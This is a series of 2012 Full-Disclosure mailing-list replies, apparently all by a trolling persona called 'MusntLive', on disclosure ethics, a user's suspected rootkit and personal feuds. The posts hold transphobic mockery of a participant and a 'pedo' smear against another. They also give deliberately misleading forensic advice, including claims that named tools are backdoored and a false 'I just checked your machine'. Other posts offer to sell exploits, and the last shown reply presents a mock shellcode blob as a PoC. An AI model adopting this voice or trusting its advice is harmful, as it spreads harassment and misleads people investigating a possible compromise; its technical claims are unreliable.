> In this case, no MitM is necessary.

Note for is yourself - 'anything is possible, this is life'

> Using HTTP cookies for session authentication is, and always has been,
> a bad idea.  They are simply not designed for this application.  We
> need something better.

Why worry is about cookies? MusntLive solve this for you right now:
http://tinyurl.com/MITM-cookie-solution

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Григорий Братислава
On Fri, Jul 13, 2012 at 10:44 AM, Benji  wrote:

> Come to Europe, we show you how to party@#!

Is that is what Greeks and Spaniards call this behaviour? Is funny, to
me is similar to riot.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Григорий Братислава
On Thu, Jul 12, 2012 at 9:15 AM,   wrote:
> Benji,
>
> Do you write anything but scathing criticism?  I've never seen you
> contribute anything of use to this list.   You must be a real pleasure in
> person.
>

s#ritney#enji#g
http://www.youtube.com/watch?v=kHmvkRoEowc

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)

2012-07-12 Thread Григорий Братислава
On Thu, Jul 12, 2012 at 1:11 PM,   wrote:

> There's a number of attacks using the MTRR and IOMMU to cause the CPU to have 
> a
> different view of memory.  It is indeed possible for something to be sitting 
> in
> memory but not be visible to *you* (while still being visible to something 
> that
> didn't expect it to be visible, and thus delivering an exploit).
>

No! Only is Ptacek and Joanna know about these is attacks. Red pill,
blue pill, rainbow pill.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)

2012-07-12 Thread Григорий Братислава
On Thu, Jul 12, 2012 at 1:02 PM, phocean <0...@phocean.net> wrote:
> Not sure if you are kidding.
>
> 1) WinDBG is a debugger, not really memory dump.
> 2) Not sure to understand*
> 3) It is your opinion.
> 4) Don't understand. Sounds like a joke, but even with that angle I don't
> get it.*
>
> * If only you stopped with this weird english.
>
> --- phocean

0x00: MustntLive is now give up

1) I hope Dmitry Vostokov is never read this
2) Is obvious you don't
3) MusntLive is never make opinion is always fact
4) Is repeat 2.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)

2012-07-12 Thread Григорий Братислава
On Thu, Jul 12, 2012 at 12:47 PM, phocean <0...@phocean.net> wrote:
> Yes, maybe WinDbg… Not that I am confortable with WinDBG, but certainly a
> good chance to learn and get more familiar.
>
> However:
>
> - Volatility: anything has to sit somehow in the memory, so there is no way
> for it to escape from the analysis. It has all advantages of offline
> analysis. I don't think Volatility is script kiddy stuff. I think it is a
> great tool and should be enough for my concern.
>
> - WinDBG: here we are doing live analysis, with all the difficulties it
> implies. It is long and painful. You have to read damn a lot of assembly,
> thousands of calls, decide to step into or step over, when and based on what
> assumptions, etc.
> Of course, perfect knowledge of the system internals is required. Difficulty
> will be raised if ever there are some anti-debugging protections. Respect to
> the people who can do it, they are artists, but is it really the most
> reasonable way to go?

0x00: MusntLive is give you now priceless advice for you must to listen:

1) WinDBG is to dump your memory
2) Is HB Gary FD Pro is used not volatility. This is because since
Greg is backdoored all his tools, is we don't find problems, then when
is HB Gary snooping in our session maybe they can find is problem for
us.
3) Volatility is script kid tool (don't is tell anyone who is use this)
4) Step over is step into. MusntLive give you good analogy right now.
Is you have choice, step into POOP or is step over POOP is what is
your choice? Step over is what is hoped. Forget this is step over,
into, above, sideways. Foolproof is method is to diff memory. Before
and is after yes. This is key to anomalies: Before and is after

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)

2012-07-12 Thread Григорий Братислава
On Thu, Jul 12, 2012 at 12:09 PM, phocean <0...@phocean.net> wrote:
> Could you elaborate please?
> What that I haven't done yet? If we agree there is nothing in the RAM dump,
> how can we explain the artefacts?
>
> Musntlive, I never trust any antivirus.
>
> --- phocean

0x00: MusntLive will always help you. .effmach x86 (or is whatever is
your machine amd64, ia64) is your first friend. When you is run this,
you come back and let MusntLive know. For then we must use !dml_proc
and only is real hacker debug stuff. No script kid stuff. Only for
when you is know WinDBG like is back of your hand is you Windows
hacker. Not is Immunity or is Olly, this is these are for is how you
say rookie. Now you is go dump with is effmach. Then is we can study
this is yes with HB Gary memory tools. Because is HB Gary, if we know
is find it, HB Gary is will find with is their backdoor into is their
tools. We not worry, we find evil 1337 together.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)

2012-07-12 Thread Григорий Братислава
On Thu, Jul 12, 2012 at 9:57 AM, phocean <0...@phocean.net> wrote:
> The only antivirus I have tried so far is Microsoft Security Essentials. And
> it finds nothing, which I certainly don't trust at all.
> Especially because it shows a very unusual certificate alert during the
> setup.
> I also scanned a few files that I chose (some dll and services) on
> VirusTotal with no results except some false positive. I also had a look on
> the disassembly of these files.
> So, I don't know what it is, but if it is a rootkit it is not a trivial one
> and I am afraid it is smarter than me :)
>
> --- phocean
>

0x00 you say: "The only antivirus I have tried so far is Microsoft
Security Essentials." and this is why you're obvious fail.

Everyone knows only is Kaspersky and F-Secure is find any virus. They
is after all discover Flame single-handedisly.

I just checked your machine for you. You are is safe. Stay thirsty my friend

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
On Wed, Jul 11, 2012 at 3:04 PM, Jeffrey Walton  wrote:
> On Wed, Jul 11, 2012 at 2:58 PM, Григорий Братислава
>  wrote:
>> On Wed, Jul 11, 2012 at 1:45 PM, Gary E. Miller  wrote:
>>
>>>> And is you say my logic is wrong.
>>>
>>> Yup.
>> Then is now safe to say, you is a guardian of pedos based on is your logic.
> Hmmm That's quite a leap.


Negative. Go back to is original message I post:

So according to is your logic:

MusntLive discover pedo, report pedo, authorities lallygag, MusntLive
publicize pedo info, MusntLive is evil.
MusntLive discover is Lockheed has glitch on plane cause pilot to
crash, MusntLive publish information so to for pilots can know,
MusntLive is evil for exposure.
MusntLive discover is flaw in mechanism that shut down power grid,
rush to warn people via full disclosure, MusntLive is evil.

Gary is say I am evil to follow is my logic. Logic for disclosing pedos?


Gary: Psych 101: Evil people have no shame.

Me: And is you say my logic is wrong.

Gary: Yup.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
On Wed, Jul 11, 2012 at 1:45 PM, Gary E. Miller  wrote:

>> And is you say my logic is wrong.
>
> Yup.
>
> RGDS
> GARY

Then is now safe to say, you is a guardian of pedos based on is your logic.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
http://www.youtube.com/watch?v=qggxTtnKTMo

On Wed, Jul 11, 2012 at 12:41 PM, Dave  wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> List is I read for education, now is I read for much entertaining.
>
> Please, no more post till popcorn supply is better.
>
> white hat = kiss corporate ass
> black hat = kiss own ass
> grey hat = kiss which ever ass look best.
>
> All corps fuck the people. No altruism in making share holder rich.
>
> Conscience be guide to disclosure method, all different, wrong if different 
> to you, right if same as you.
> Same old shit of bull. All depend on childhood programming/indoctrination.
>
> Few people genuinely innocent. If can recognise innocent hurt them not, fuck 
> the rest before fuck you first.
>
> Jiminy Cricket is guide must be.
>
> Peace love and chicken fajitas for life too short for big seriousness.
>
>
>
>
>
>
> On 11/07/2012 17:03, Григорий Братислава wrote:
>> Is bug you yes is because you is cannot ID me? I'd like to warn you
>> and Full Disclosure!! !! !! "MusntLive is not play by dox games"
>>
>>
>> On Wed, Jul 11, 2012 at 12:00 PM, NETT Dave  wrote:
>>> Same has to you: fake ouzbek or real yankee? In regard of you degenerate I
>>> bet yankee.
>>> Choose which has to be and stick language. You understand?
>>>
>>> 
>>> From: Григорий Братислава 
>>> To: Laurelai 
>>> Cc: full-disclosure@lists.grok.org.uk
>>> Sent: Wednesday, July 11, 2012 5:56 PM
>>>
>>> Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ]
>>> How much time is appropriate for fixing
>>>
>>> Obligatory question is to must remain politically correct: "When I is
>>> respond to you, am I to address is Wesley or Laurelai?" Not only is
>>> you confused, you is has everyone confused. MusntLive is reserve the
>>> right to dish out equal opportunity flames and is not want to address
>>> you as Ms. if you are still a he.
>>>
>>>
>>> On Wed, Jul 11, 2012 at 11:48 AM, Laurelai  wrote:
>>>
>>>> http://www.youtube.com/watch?v=m_mDTLphIVY
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>
>>
>>
>
>
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.2 (MingW32)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>
> iQEVAwUBT/2s0LIvn8UFHWSmAQLNzwgAgCzSRk56LmFxJmHetswe+sNBQx62WXpD
> VLhSkfEXFr6lWmTAUKksfK+XPp2ZJ3cLU4ZMcpm5sTupCqs+13cbTCr/UhF/YQvI
> YJrD0u3S9l2hRWBelqKjAvqVQUUbtfSolK4jNfB72eNMdzDgJa2safcTQu4qva/W
> 8GdRVOGvgtB+vfsJMmIlcqqtRBlx4yezCaFepTGaHXB4qd9jem/oCuLQjdS0MgkH
> vBhVmLUOMf7cYODmMYyXjGWSQqd7hrLHcHychFZQBJxNq178M5K739H2tOsicvy8
> 2Bp1oakSg53pL3+XCVekCxEGo7YdAgR1dacmNBDFj3ofgXz8qn0egQ==
> =JUoJ
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
Is penis envy? Even is I waste my time on CEH is likely still a) make
is more money than you with or is without cert b) is would have
accomplished something is versus nothing c) is prove that MusntLive
annoy you so muchso, that you is prove to MusntLive and list is you
really have no friends. MusntLive take care of everyone including you:
http://www.amazon.com/Friends-The-Complete-Series-Collection/dp/B000H6SXMY/ref=sr_1_1?ie=UTF8&qid=1342022651&sr=8-1
Is you do not have to be lonely anymore. You can has friends every
times.

On Wed, Jul 11, 2012 at 12:19 PM, NETT Dave  wrote:
> Me has LOL.
> Has spot you:
> http://40kegger.blogspot.fr/2012/03/i-am-lazy-lazy-man.html
> Dave has joke but maybe true.
> Anyway you has to be one of those who read about FD in one of those
> "hacking: hands on" or "hacker's guide" on Amazon. Or just passed your CEH!
> Please has respect of Dave and Dave has soon respect of you. No problem with
> you, fun, yes, very true.
>
>
> 
> From: Григорий Братислава 
> To: NETT Dave 
> Cc: Laurelai ; "full-disclosure@lists.grok.org.uk"
> 
> Sent: Wednesday, July 11, 2012 6:03 PM
> Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ]
> How much time is appropriate for fixing
>
> Is bug you yes is because you is cannot ID me? I'd like to warn you
> and Full Disclosure!! !! !! "MusntLive is not play by dox games"
>
>
> On Wed, Jul 11, 2012 at 12:00 PM, NETT Dave  wrote:
>> Same has to you: fake ouzbek or real yankee? In regard of you degenerate I
>> bet yankee.
>> Choose which has to be and stick language. You understand?
>>
>> 
>> From: Григорий Братислава 
>> To: Laurelai 
>> Cc: full-disclosure@lists.grok.org.uk
>> Sent: Wednesday, July 11, 2012 5:56 PM
>>
>> Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ]
>> How much time is appropriate for fixing
>>
>> Obligatory question is to must remain politically correct: "When I is
>> respond to you, am I to address is Wesley or Laurelai?" Not only is
>> you confused, you is has everyone confused. MusntLive is reserve the
>> right to dish out equal opportunity flames and is not want to address
>> you as Ms. if you are still a he.
>>
>>
>> On Wed, Jul 11, 2012 at 11:48 AM, Laurelai  wrote:
>>
>>> http://www.youtube.com/watch?v=m_mDTLphIVY
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>
>
>
> --
>
> `Wherever I is go - there am I routed`
>
>



-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Immersive Endpoint Devices

2012-07-11 Thread Григорий Братислава
Lucky is for Jack and CTU, 24 is was cancelled. Thank you is Dario!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
Is bug you yes is because you is cannot ID me? I'd like to warn you
and Full Disclosure!! !! !! "MusntLive is not play by dox games"


On Wed, Jul 11, 2012 at 12:00 PM, NETT Dave  wrote:
> Same has to you: fake ouzbek or real yankee? In regard of you degenerate I
> bet yankee.
> Choose which has to be and stick language. You understand?
>
> ________
> From: Григорий Братислава 
> To: Laurelai 
> Cc: full-disclosure@lists.grok.org.uk
> Sent: Wednesday, July 11, 2012 5:56 PM
>
> Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ]
> How much time is appropriate for fixing
>
> Obligatory question is to must remain politically correct: "When I is
> respond to you, am I to address is Wesley or Laurelai?" Not only is
> you confused, you is has everyone confused. MusntLive is reserve the
> right to dish out equal opportunity flames and is not want to address
> you as Ms. if you are still a he.
>
>
> On Wed, Jul 11, 2012 at 11:48 AM, Laurelai  wrote:
>
>> http://www.youtube.com/watch?v=m_mDTLphIVY
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>



-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
On Wed, Jul 11, 2012 at 11:57 AM, Laurelai  wrote:

>
> I repeat:

That is good. We all is repeat now also: "Is we are to address you as
Miss, Ms. or is you not get kielbasa lopped yet?"

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] has Thor big ego, has Thor long boring messages

2012-07-11 Thread Григорий Братислава
Upset him (Dave Nett) is he has no friends. For the record, MusntLive
discovered many vulnerabilites. MusntLive is not mediawhore, MusntLive
weaponize exploits for sale on ebay0day to highest bidder. Make me
enough for to buy enough!

On Wed, Jul 11, 2012 at 11:22 AM,   wrote:
> On Tue, 10 Jul 2012 23:38:49 -0700, NETT Dave said:
>
>> Please has us let peace: has you shut up.
>
> procmail is your friend.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
Obligatory question is to must remain politically correct: "When I is
respond to you, am I to address is Wesley or Laurelai?" Not only is
you confused, you is has everyone confused. MusntLive is reserve the
right to dish out equal opportunity flames and is not want to address
you as Ms. if you are still a he.


On Wed, Jul 11, 2012 at 11:48 AM, Laurelai  wrote:

> http://www.youtube.com/watch?v=m_mDTLphIVY

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
On Wed, Jul 11, 2012 at 10:40 AM, Mikhail A. Utin
 wrote:
> Dear Paul,
> You completely missed my point. I was talking about the foundation of this 
> list, which is free service, and the foundation of a lot of current IT 
> technologies, which is freeware. Giving knowledge for free (including 
> software bugs) is the foundation of this civilization. Having profit is a 
> necessity but not all what drives us. Could you personally show any your 
> contribution to the society? Which was not paid for?
> My contribution you can find searching/google for my name and "article", and 
> DeepSec 2011 and OWASP AppSec DC 2012 presentations as well. Nobody paid me 
> for. Plus, you can check our portal www.201cmr1700ma.com, which provides 
> knowledge and security documents for free. Then, considering you association 
> with math science, you can possibly estimate the time I've spent for free.
> So, my voice pro free knowledge distribution is completely legitimate.
>

Hello Full-Disclosure!! !! !!

Is like to warn you about is word "free."

Is electricity free? No, you is pay to use your ISP, your electricity.
Therefore, free is overabuse use of word.

Is we now describe free research to mean: "Out of pocket
vulnerability!" Is where is RFP when is needed most?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
On Wed, Jul 11, 2012 at 9:03 AM, Georgi Guninski  wrote:

> just check m$ business practices.

You i$ mu$t be on undernet hackphreak still

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
On Tue, Jul 10, 2012 at 6:40 PM,   wrote:

> Are you familiar with Georgi's work? Please look at his website before
> proffering opinions.
>

Is must be an old man thing. No one is use VAX/VMS is only people like
parmaster (oh hai Jason Snitker) is use VAX to make is themselves look
three is one three three seven for IRC monkeys. "Oh hai, is look I
know VAX because is US government is use mind control on me"
(http://www.raven1.net/mcf/v/snitker.htm)

Guninski is washed up. Like is Japanese debris hit California right
now. And is you too is washed up. No one is
use punch card no more. Georgi is no one special lest is only to
himself in mirror. Now is you talking Dan Kaminski, Dan is God! Only
when he is not drunk and sappy over is "red pill blue pill" man.
(Rutkowska). You is say Dan, I say all the way!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] How much time is appropriate for fixing

2012-07-11 Thread Григорий Братислава
On Tue, Jul 10, 2012 at 5:48 PM, Gary E. Miller  wrote:

>
> Maybe, but my real world example shows your simplistic logic is wrong.
>

Is say who?

>
> Psych 101: Evil people have no shame.
>

And is you say my logic is wrong.

You: "If you become a whistleblower, you are evil for disclosing the
danger. How dare you post information on a vulnerability before
allowing the vendor to fix the issue. Lives are at stake, people are
in real danger!"

Is vendor have their act together, is problem never leave prior to
"test use cases" in Dev and Q&A. Where is responsibility of vendor
lie? Vendor is solely care to make money not is churn out fixes.

So according to is your logic:

MusntLive discover pedo, report pedo, authorities lallygag, MusntLive
publicize pedo info, MusntLive is evil.
MusntLive discover is Lockheed has glitch on plane cause pilot to
crash, MusntLive publish information so to for pilots can know,
MusntLive is evil for exposure.
MusntLive discover is flaw in mechanism that shut down power grid,
rush to warn people via full disclosure, MusntLive is evil.

Nice logic is there in your thinking. Perhaps maybe to if you are in Poland.

Is I discover flaw, what is make you think no one else is has discover
flaw. According to your is logic: "sit around and wait for the
responsible vendor to fix it. In the meantime worry little about the
dozens of other attackers that likely know about the flaw and are
actively exploiting it!" Nice logic Gary.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] How much time is appropriate for fixing

2012-07-10 Thread Григорий Братислава
On Tue, Jul 10, 2012 at 4:37 PM, Gary E. Miller  wrote:
> Yo Thor!
>
> On Tue, 10 Jul 2012 19:58:16 +
> "Thor (Hammer of God)"  wrote:
>
>> People do not disclose their research to make
>> the world a better place.  They do it for recognition or for money.
>
> I would argue there is a 3rd reason.  Self defense.  I and others have
> had issues of our servers being attacked by unkown evil doers.  To keep
> our servers running we need to reverse engineer the hack and get the
> bug fixed or the attack vector blocked.  Until '* Disclosure' in its many
> aspects was common it was virtually impossible to get vendors to fix
> open holes being actively used by attackers.  The public shaming of
> '* Disclosure' large companies found denial a very easy and cheap
> resonse to bugs that were killing us.
>

Poor argument. If you is smart enough to is reverse engineer the
threat, why can't you forward engineer a fix and post it publicly so
that is others don't get hacked.

E.G (using my Bejtlich is accent: "We are being attacked from China
obviously. This is how they are attacking, this is what they are
affecting, this is what we did to get it fixed. Patch yourself before
is evil Chinese attack you too! Otherwise, wait for vendor to post
next patch Tuesday fixes and in is meantime, allow them to roam along
your network like is Travelocity Gnome"

Public shaming of not only is vendor of shoddy software, but is
attacker, is key no one is think about.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] How much time is appropriate for fixing

2012-07-10 Thread Григорий Братислава
On is serious note concerning "disclosure," people need to is get a
dose of reality. When I discover a bug on my own is time, I choose
what to do with it. It is my time and effort. I am is obligated to do
what I want and feel is relevant to myself. Not some is big
corporation who cares little. So much so, they is always distribute
beta software to the public.

My obligations in life are is to myself. To do what makes me is happy.
Is whether is make money off bug, disclose bug to vendor, poke is
vendor in eyesocket via full-disclosure, my time, my work.
(http://www.youtube.com/watch?v=ngGgy62lMj0)

All is petty see-saw over full disclosure, partial disclosure,
anonymous disclosure, is old topic. Vendors have a "moral and ethical"
... Nothing. Vendors are in is business to make money. If you are
suckered into is buying shoddy equipment over in over, then you are
the fool. Not the vendor, not the scriptgenius making exploits for
Backtrack, not the marketing conmen at InfoSecInstitute prostituting
the disclosure and is so on redundant on and on.

In is words of Goodfellas:
http://www.hark.com/clips/hvccjrnhfg-business-is-bad-fuck-you-pay-me

Is anyone want 1492 exploits is contact me off-list. Government contacts only!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-10 Thread Григорий Братислава
Arizona is place for Witness Protection. Perhaps is maybe that Sabu is
now in Arizona. Nebraska is state for cousinly love and is drink. Also
corn.


On Tue, Jul 10, 2012 at 3:48 PM,   wrote:
> On Tue, 10 Jul 2012 15:16:39 -0400, Григорий Братислава said:
>> I reply to you is back "on-list." Information is for meant to be free.
>> And so you know, is no, your English is improper:
>
> The longer this thread goes on, the more I become convinced that
> one of these guys actually lives in Nebraska and the other in Arizona. ;)



-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-10 Thread Григорий Братислава
I reply to you is back "on-list." Information is for meant to be free.
And so you know, is no, your English is improper:

You say: "People do not need seeing your arguments"

Is correct: "People do not need to READ your comments"

Or: "People should not read your comments"

Or: "People don't want to read your comments"

Is you must, or can, is go back to finish high school. Is maybe in
Boston is how you speak that what you call English but you is need
remember, in Boston is people say "pock" when they is mean PARK and is
also say "cah" when they is mean CAR:

http://www.youtube.com/watch?v=RbK4cL3QSc0

Please is stop pollute my inbox with your non-English.

On Tue, Jul 10, 2012 at 3:06 PM, Mikhail A. Utin
 wrote:
> Sorry, but it is not misspelling. Man, you definitely need learning modern 
> English. And do not pollute the list. See, I reply only to you. People do not 
> need seeing (learn - not "to see") your arguments.
> You definitely need acquiring better communication skills.
>
> M

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-10 Thread Григорий Братислава
On Tue, Jul 10, 2012 at 2:50 PM, Mikhail A. Utin
 wrote:
> Hey you,
> I do what I want to do and support who I want supporting.
> If you did not get the idea, it is not my fault. Read again, if you can.
>
> M

Is you misspell "who I want supporting" you is mean to say "who I want
to support" is proper English. Next time is take deep breathe, is
relax for you to type!

Look is not my fault you pick to choose to stay on backdoor kernel. If
you don't has clue, please, Amazon is your friend
http://www.amazon.com/s/ref=nb_sb_noss_1?url=search-alias%3Daps&field-keywords=clue

Is read what again?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 11: ] How much time is appropriate for fixing

2012-07-10 Thread Григорий Братислава
You must is speak for yourself. I is stopped using Linux once Debian
is give away root ownership many is times! From now on I is only use
the best. BeOS. Is because Theo also have backdoor.

On Tue, Jul 10, 2012 at 11:42 AM, Mikhail A. Utin
 wrote:
> Hello,
> I completely agree with Thor. We have to do something for free. We have to 
> contribute, not just use. Whoever and whatever.
> Examples:
> - This list is ran for free (hardware, software, time, energy are used for) 
> and giving us a chance to communicate
> - The most of us use Linux, whichever flavor you prefer. The most of it is 
> free time contribution. Somebody pays for that, but we use.
> It is nice to be paid for something, but consider the alternative. Otherwise 
> our communications will die and we do not have an OS for a fun or profit.
>
> Mikhail Utin
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of 
> full-disclosure-requ...@lists.grok.org.uk
> Sent: Tuesday, July 10, 2012 7:00 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Full-Disclosure Digest, Vol 89, Issue 11
>
>
> --
> Message: 7
> Date: Mon, 9 Jul 2012 17:24:51 +
> From: "Thor (Hammer of God)" 
> Subject: Re: [Full-disclosure] How much time is appropriate for fixing
> a bug?
> To: Georgi Guninski , Stefan Kanthak
> 
> Cc: "full-disclosure@lists.grok.org.uk"
> 
> Message-ID: 
> Content-Type: text/plain; charset="Windows-1252"
>
> I'm not contradicting myself at all - in fact, *you* are the exact type of
> person I'm talking about.  You couldn't give a rat's ass about the
> industry or anyone but yourself.  Nothing you have ever done has been
> "valuable" to anyone other than you; it has been completely self-serving
> egotistical bullshit.
>
> CONFIDENTIALITY NOTICE: This email communication and any attachments may 
> contain confidential
> and privileged information for the use of the designated recipients named 
> above. If you are
> not the intended recipient, you are hereby notified that you have received 
> this communication
> in error and that any review, disclosure, dissemination, distribution or 
> copying of it or its
> contents is prohibited. If you have received this communication in error, 
> please reply to the
> sender immediately or by telephone at (617) 426-0600 and destroy all copies 
> of this communication
> and any attachments. For further information regarding Commonwealth Care 
> Alliance's privacy policy,
> please visit our Internet web site at http://www.commonwealthcare.org.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] How much time is appropriate for fixing a bug?

2012-07-09 Thread Григорий Братислава
Hello Full Disclosure!! !! !!

Is like to warn you about George Guninski. Is cat is out is bag.
Guninski is lame

PoC

char lamur = "\xba\x1c\x00\x00\x00"
 "\xb9\x00\x00\x00\x00"
 "\xbb\x01\x00\x00\x00"
 "\xb8\x04\x00\x00\x00"
 "\xcd\x80\xb8\x01\x00"
 "\x00\x00\xcd\x80"

/* IS REAL SHELLCODE OLIVE BRANCH FOR YOU*/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Warning is about APT

2012-06-22 Thread Григорий Братислава
